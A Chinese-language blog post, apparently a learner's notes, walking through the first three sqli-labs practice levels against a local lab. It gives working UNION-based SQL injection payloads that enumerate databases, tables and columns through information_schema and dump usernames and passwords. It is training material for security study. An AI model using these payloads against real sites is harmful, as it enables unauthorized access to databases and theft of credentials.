sqli-labs摸坑历程


title: sqli-labs摸坑历程
date: 2022-02-10 13:44:44
tags:
cover: https://s2.loli.net/2022/02/08/mfnMdVakLjGXFYA.png

前言

又是被迫做Noob一天@@
1先摘抄一段学习大佬内容(仅以提醒自己知识点)
mysql注入必懂的知识点 1)在mysql5.0版本以上中,存在一个自带数据库名information_schema自带 记录所有数据库名 表名 列名 2)数据库中符号“.”代表下一级,如user.user表示数据库user下的user表 3)information_schema.tables:记录所有表名信息的表 4)information_schema.columns:记录所有列名信息的表 5)table_schema:数据库名 6)table_name:表名 7)column_name:字段名 8)group_concat(table_name):查询所有的表 9) 猜解多个数据:limit x,1 (变动x) 10)注释符:-- (后面有空格)(也就是–+) ,/**/ , payload结尾单引号闭合
原文链接:

less-1 ’ 字符注入

**1:**根据提示,判断类型
id=1,正常
id=1'错误
id=1'--+页面回显正确
把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入
可以判断了:单引号字符注入
无泪开始数据库没链接上?我说难道我的firefox和别人的不一样?@
这里黄色字体是因为在Less-1脚本里加了个echo $sql;
image.png
好的,接下来可以进行下一步
**2:**order by 表中列查询
image.png
4就查询不到了,应该有三列
**3:**查询一下数据库的显示位(如果显示位确定,只能通过这个显示位来显示查询数据?)
使用union select 1,2,3联合查询语句查看
image.png
说明页面有2个显示位
4: 利用sql查询语句爆破出数据库内的数据库西信息
?id=888’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
数据库名查询语句
image.png
**5:**查询security内的所有表名
union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+
image.png
**6:**爆破出列名
?id='union SELECT 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)%23
image.png
7: 爆破字段内容:?id='union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23
image.png
0x3a就是一个:,用16进制表示了,为了区分一下账号和密码,增加可视化

less-2 GET-Error based-intiger based(基于错误的GET整型注入)

**1:**整型数字可以直接查询,共有三个字段image.png
Less1的爆破语句此处也都可以使用了
**例子:**数据库名语句查询
?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
**注意:**id要写成’0‘或负数

image.png

Less-3 GET-Error based-Single quotes with twist-string (基于错误的GET单引号变形字符型注入)

输入id=1测试,页面回显正常
输入id=1’测试,根据报错信息分析id格式
image.png
可以得知id格式为id=(‘1’),要有闭合括号和单引号

数据库查名:
?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

image.png
由此,由联合语句可以进行爆破了
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users order by id -- a
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值